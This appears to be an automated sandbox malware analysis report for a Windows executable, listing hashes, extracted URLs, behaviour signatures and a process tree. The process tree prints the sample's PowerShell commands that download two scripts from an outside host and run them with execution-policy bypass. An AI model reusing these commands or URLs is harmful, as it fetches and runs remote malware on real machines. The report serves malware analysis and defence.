Resubmissions

| Submitted | Analysis ID | Score |
|---|---|---|
| 21/01/2025, 12:01 | 250121-n61zrssrbr | 10 |
| 21/01/2025, 11:10 | 250121-m9zqfazqh1 | 10 |
| 16/07/2024, 00:12 | 240716-ahlnaayeqf | 10 |

Analysis
- max time kernel: 106s
- max time network: 17s
- platform: windows7_x64
- resource: win7-20240729-en
- resource tags: arch:x64, arch:x86, image:win7-20240729-en, locale:en-us, os:windows7-x64, system
- submitted: 21/01/2025, 11:10
Static task
- static1

Behavioral tasks (sample 34c2047d0b69ba023b700c21431accc0N.exe in every task)
- behavioral1: resource win7-20240729-en
- behavioral2: resource win10v2004-20241007-en
- behavioral3: resource android-x64-arm64-20240624-en
- behavioral4: resource android-33-x64-arm64-20240624-en
- behavioral5: resource macos-20241106-en
- behavioral6: resource ubuntu1804-amd64-20240611-en
- behavioral7: resource debian9-armhf-20240729-en
- behavioral8: resource debian9-mipsbe-20240611-en
- behavioral9: resource debian9-mipsel-20240729-en
General
- Target: 34c2047d0b69ba023b700c21431accc0N.exe
- Size: 258KB
- MD5: 34c2047d0b69ba023b700c21431accc0
- SHA1: e34c28611707c81565cb73d8a1a46dfc3ab2495a
- SHA256: ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
- SHA512: a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
- SSDEEP: 6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted URLs:
- http://thelustfactory.com/vns/1.ps1
- http://thelustfactory.com/vns/2.ps1
Signatures
- (signature title not captured in the extracted page)
  pid / Process: 2000 powershell.exe; 3016 powershell.exe; 2768 powershell.exe; 2872 powershell.exe
- HTTP links in PDF interactive object (1 IoCs)
  Detects HTTP links in interactive objects within PDF files.
  resource / yara_rule: behavioral1/files/0x000700000001961c-60.dat pdf_with_link_action
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description / ioc / Process: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe
- Delays execution with timeout.exe (1 IoCs)
  pid / Process: 2764 timeout.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  pid / Process: 2288 AcroRd32.exe
- Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid / Process: 2000 powershell.exe; 3016 powershell.exe; 2872 powershell.exe; 2768 powershell.exe
- Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  pid / Process: 2288 AcroRd32.exe
- Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description / pid / Process: Token: SeDebugPrivilege 2000 powershell.exe; Token: SeDebugPrivilege 3016 powershell.exe; Token: SeDebugPrivilege 2872 powershell.exe; Token: SeDebugPrivilege 2768 powershell.exe
- Suspicious use of SetWindowsHookEx (3 IoCs)
  pid / Process: 2288 AcroRd32.exe (reported 3 times)
- Suspicious use of WriteProcessMemory (22 IoCs)

  | Source PID | Source process | Wrote to PID | procid_target | Occurrences |
  |---|---|---|---|---|
  | 1096 | 34c2047d0b69ba023b700c21431accc0N.exe | 1476 | 30 | 3 |
  | 1476 | cmd.exe | 2000 | 32 | 3 |
  | 1476 | cmd.exe | 3016 | 33 | 3 |
  | 1476 | cmd.exe | 2872 | 34 | 3 |
  | 1476 | cmd.exe | 2768 | 35 | 3 |
  | 1476 | cmd.exe | 2764 | 36 | 3 |
  | 1476 | cmd.exe | 2288 | 37 | 4 |
Processes
- C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe (PID 1096, depth 1)
  Command line: C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe sh $MOZILLA\\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe (PID 1476, depth 2)
    Command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7DD7.tmp\7DD8.tmp\7DD9.bat C:\Users\Admin\AppData\Local\Temp\34c2047d0b69ba023b700c21431accc0N.exe sh $MOZILLA\\nPLUGIN %SIGILL% "SIGTERM|DESTROY|SIGKILL""
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2000, depth 3)
      Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3016, depth 3)
      Command line: powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2872, depth 3)
      Command line: powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps1
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2768, depth 3)
      Command line: powershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps1
      Signatures: Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\system32\timeout.exe (PID 2764, depth 3)
      Command line: timeout /t 5
      Signatures: Delays execution with timeout.exe
    - C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe (PID 2288, depth 3)
      Command line: "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"
      Signatures: System Location Discovery: System Language Discovery; Suspicious behavior: CmdExeWriteProcessMemorySpam; Suspicious behavior: GetForegroundWindowSpam; Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads
- (file path not captured in the extracted page)
  Filesize: 712B
  MD5: 0e9ce5162ba7661c863a835f9d34d907
  SHA1: 0b351312ab57a02857753cab2287da680955f40d
  SHA256: b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
  SHA512: 8d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
- (file path not captured in the extracted page)
  Filesize: 3KB
  MD5: 9ebfe419a053661ac76f942a4ac8ab40
  SHA1: 241c9c805682e751f257adab261e23ebcaa553cb
  SHA256: f3e5e2c2a3f8e4acb007fd049ebf003843a94992befd51e0c1a9e24af0b9936d
  SHA512: 5e18af05b46036683b5b8cb6b5cf17333e48ff85fc8bf890180705e480a2d3e4ec780dfe9276306fb9baa7a2e82e7bab24e8309610b8eabbe4cbea3e7893871e
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 79d22fe1adc4829d894b90115218a5f8
  SHA1: dedc5b5e4679b6eae1532d1d14dc0b5dd0aa112d
  SHA256: 7e96e31ae35536df08be7649b632565294497dc75375a9bcc210f2e82a637fc6
  SHA512: c3d3e3bdf915d143bbad266eeb2e1187dbeb3469d200f44bff977da01e3ed9325d55c05bd53537d51ea2b8910e98fb8c448b95643af0f029aeccd3961131b2a4
- (file path not captured in the extracted page)
  Filesize: 139KB
  MD5: 5afaf79789a776d81ec91ccbdc9fdaba
  SHA1: 6703901978dcb3dbf2d9915e1d3e066cfe712b0a
  SHA256: 38c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
  SHA512: 09253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288